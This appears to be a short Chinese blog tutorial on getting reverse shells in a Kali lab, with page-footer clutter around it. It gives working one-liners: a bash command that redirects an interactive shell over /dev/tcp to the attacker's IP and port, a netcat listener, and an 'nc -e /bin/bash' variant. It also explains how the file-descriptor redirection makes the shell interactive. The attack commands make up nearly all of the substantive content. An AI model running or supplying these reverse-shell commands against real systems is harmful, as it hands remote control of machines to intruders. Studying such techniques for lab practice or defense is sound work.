反弹shell方法

1、bash反弹shell

kali ip:192.168.10.130

目标机上执行命令:bash -i >& /dev/tcp/192.168.10.130/8888 0>&1

kali机执行命令:nc -lvp 8888

bash -i:在本地打开一个bash终端

linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:

0 - stdin 代表标准输入,使用<或<<
1 - stdout 代表标准输出,使用>或>>
2 - stderr 代表标准错误输出,使用2>或2>>

还有就是>&这个符号的含义,最好的理解是这样的:

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

 bash -i >& /dev/tcp/192.168.10.130/8888的执行结果就是将bash中命令的执行结果输出到kali机,而kali开启了nc对指定端口的监听模式,所以可以接收到目标机传送过来的输出结果。那么0>&1是什么作用呢,nc监听连接目标机后,尝试输入命令发现,我们输入了,命令也可以执行,但是kali端却看不到键盘的输入,0>&1就是把标准输入定向到标准输出,这样在kali机上就能看到键盘的输入了。

2、nc反弹shell(目标机上已经安装nc)

kali执行;

nc -lvp 7777

 目标机执行:

nc -e /bin/bash 192.168.0.4 7777

这样就能拿到shell了。

详情参考:https://www.freebuf.com/articles/system/178150.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值